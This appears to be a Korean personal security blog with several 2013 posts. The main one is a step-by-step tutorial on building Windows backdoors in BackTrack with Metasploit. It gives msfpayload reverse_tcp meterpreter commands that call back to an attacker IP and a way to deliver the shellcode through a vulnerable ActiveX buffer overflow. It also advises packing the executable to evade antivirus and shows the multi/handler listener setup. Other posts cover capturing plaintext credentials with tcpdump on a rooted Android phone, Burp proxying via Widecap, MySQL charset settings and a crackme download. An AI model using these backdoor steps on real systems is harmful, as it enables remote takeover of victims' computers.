2013년 8월 17일 토요일

BackTrack으로 Window용 BackDoor 만들기



테스트 환경 :
BackTrack5 R3 metasploit v4.5.0-dev
Windows XP SP3

1. shellcode용 윈도우 백도어 작성

  명령 형식.
# msfpayload [module] [module-options] [option]

ex) 
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2(공격자IP) LPORT=4444(공격자포트) J

옵션 J 는 "%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b"와 같은 형식으로 쉘코드를 출력합니다.

해당 쉘코드를 생성하면 쉘코드가 화면에 출력되는데 너무 많아 파일에 바로 넣어야 합니다.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 J > /var/www/shell.txt

이러면 /var/www/shell.txt에 쉘코드가 저장됩니다.
파일 확인
# ll /var/www/shell.txt
-rw-r--r-- 1 root root 2257671 2013--8-13 17:50 /var/www/shell.txt





Shellcode가 두가지 생성되는데 첫번째 코드가 피해자가 공격자의 IP에 열린포트 4444로 접속을 하여 Session을 연결하는 코드입니다.

<Shellcode 예시>

shellcode를 http로 다운받기 위해 아파치 서버를 엽니다.

Applications -> BackTrack -> Services -> httpd -> apache start 버튼 클릭



웹 서비스를 시작하고 http://192.168.0.2/shell.txt를 입력하며 소스보기 저장합니다.

생성된 Shellcode가 피해자의 컴퓨터에서 실행될려면 BOF와 같은 취약점으로 Shellcode가 실행될 수 있는 조건이 필요합니다.

http://www.windowactivex.com/bbs/board.php?q=5225bc2c-a66e-4137-82ea-6938bd974d99-59-11-68-10-epagesafer-html-maonfp

또는 ActiveX

위의 URL에서 ActiveX를 다운받아 설치합니다.(윈도우 xp에서만 쉘코드 실행)
해당 ActiveX는 BOF 취약점이 존재하는 것으로써 취약점 보고서가 리포트되어 현재 서비스 되고 있지 않습니다.

HTML소스을 다운받습니다.
xp1.txt를 마우스로 가리키면 오른쪽에 아래방향 화살표가 생성되는데 클릭하시면 다운로드 가능합니다.
다운받은 xp1.txt에 새로 생성한 쉘코드로 수정하여 웹페이지를 게시하고
BackTrack에서 reverse_tcp 설정을 한 후(3번에 설명되어 있음)
ActiveX가 설치된 윈도우 xp에서 생성한 URL에 접속을 하면 쉘코드가 실행되면서 BackTrack에 접속이 됩니다.



2. 실행파일형 BackDoor 만들기

만약 테스트할 조건을 만족하지 못할경우 실행파일로 만들어 보겠습니다.

# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 x > /var/www/backdoor.exe
 

당연히 백신에서 Catch 해냅니다. 백신의 실시간 검사를 OFF하시거나 실행파일을 패킹하여 백신을 우회하여야 정상적으로 실행할 수 있습니다.

3. BackTrack에서 세션 접속.

조건이 만족한다는 가정하에 피해자는 공격자 호스트에 접속하기 위해 tcp 포트 4444를 열어주어야 합니다.

# msfconsole
msf> use exploit/multi/handler
msf> set LHOST 192.168.0.11
msf> set LPORT 4444
msf> show options
msf> exploit

BackTrack에서 포트 4444번으로 Listen을 합니다.


피해자의 컴퓨터에서 백도어 Shellcode가 실행되거나 실행파일이 실행되면 공격자호스트에 쉘이 연결됩니다.

피해자 컴퓨터에서 백도어 실행.


연결된 세션 확인.

2013년 7월 22일 월요일

안드로이드 TCPDUMP 사용하기

필요 조건1. 휴대폰 - 컴퓨터의 USB 연결.
필요 조건2. adb 유틸과 Wireshark, arm용 tcpdump 바이너리 파일
필요 조건3. 휴대폰 Root권한. 즉 Rooting 필요
다운로드 : tcpdumpWireshark


ADB는 안드로이드 SDK를 설치하면 됩니다.
Rooting은 테그라크 등 블로그, 카페에서 각자의 기종에 맞는 루팅법을 제공합니다.


순서 1. /system rw권한으로 리마운트

순서 2. /system/bin 폴더에 tcpdump 파일 복사
순서 3. tcpdump 권한 6755로 변경

순서 4. netcfg로 인터페이스 확인
순서 5. tcpdump 실행
순서 6. 인터넷 접속
순서 7. Wireshark로 패킷 확인

> adb shell
# mount        (system폴더에 쓰기 권한 있는지 확인을 위해)
# mount -o remount,rw /dev/block /system  (read, write 권한으로 /system폴더 리마운트)
> adb push tcpdump-arm /system/bin
> adb shell
# cd /system/bin
# ls -al tcpdump-arm
# chmod 6755 tcpdump-arm
# netcfg
# tcpdump-arm -i 인터페이스 -s 0 -w /sdcard/capture.pcap






테스트를 위해 임의의 app에서 틀린 ID/PASS로 접속시도



이제 파일에 패킷이 저장되었는지 확인합니다.
pcap파일을 컴퓨터로 복사합니다.

> adb pull /sdcard/capture.pcap

Wireshark로 packet확인


로그인에 입력하였던 ID/PASS가 평문으로 확인

2013년 4월 29일 월요일

widecap 사용법


Widecap 설치 후 실행합니다. 

Proxies 탭에서 New Proxy 를 선택하여 추가합니다. 

Server Port 에 127.0.0.1:8080을 입력하고 HTTP Proxy 를 선택 후 

Chain을 하나 만들어 사용하기 편한 이름을 입력 후 OK합니다.

본 그림에서는 http로 입력하여 만들었습니다.

<그림 1> Proxies 추가

이제 룰을 추가할 차례입니다. New Rule을 선택하여 
금방 만든 Chain인 http를 선택하고

<그림 2> Rules 추가1

Addresses 탭에서 PROXY에 Any, Any로 하나 만듭니다.

<그림 3> Rules 추가2

이 후 윈도우 아이콘에 있는 Widecap에 우클릭하여
Enable WideCap을 체크 해제했다가 다시 체크합니다. 

<그림 4> Widecap 활성화


javaw -jar -Xmx512m burpsuite를 실행하여 intercept is on을 사용하도록 두고 

<그림 5> Burpsuite 실행

Proxy로 진단하려는 프로그램을 드래그하여 Widecap에 추가합니다.

<그림 6> 프로그램 추가

진단 하려는 프로그램에서 로그인 시도 시 Burp에서 패킷을 잡는 것을 확인합니다.



이상 widecap 사용법 이었습니다.


2013년 2월 12일 화요일

mysql 언어셋 euckr로 변경




#vi /etc/mysql/my.cnf

[client]
default-character-set = euckr


[mysqld]
character-set-client-handshake=FALSE
init_connect="SET collation_connection = euckr_korean_ci"
init_connect="SET NAMES euckr"
character-set-server = euckr
collation-server = euckr_korean_ci

[mysqldump]
default-character-set=euckr

[mysql]
default-character-set=euckr

추가 후 저장

mysql 서비스 재시작
#service mysql restart

2013년 1월 26일 토요일

리버싱의 기초_크랙미

리버스 엔지니어링을 공부 할 때에 가장 기초적으로 해보는 크랙미

그 중 abex_crackme Level1~5까지의 파일을 공유합니다.

확장자를 .zip로 수정하여 사용하시기 바랍니다.

크랙미 다운로드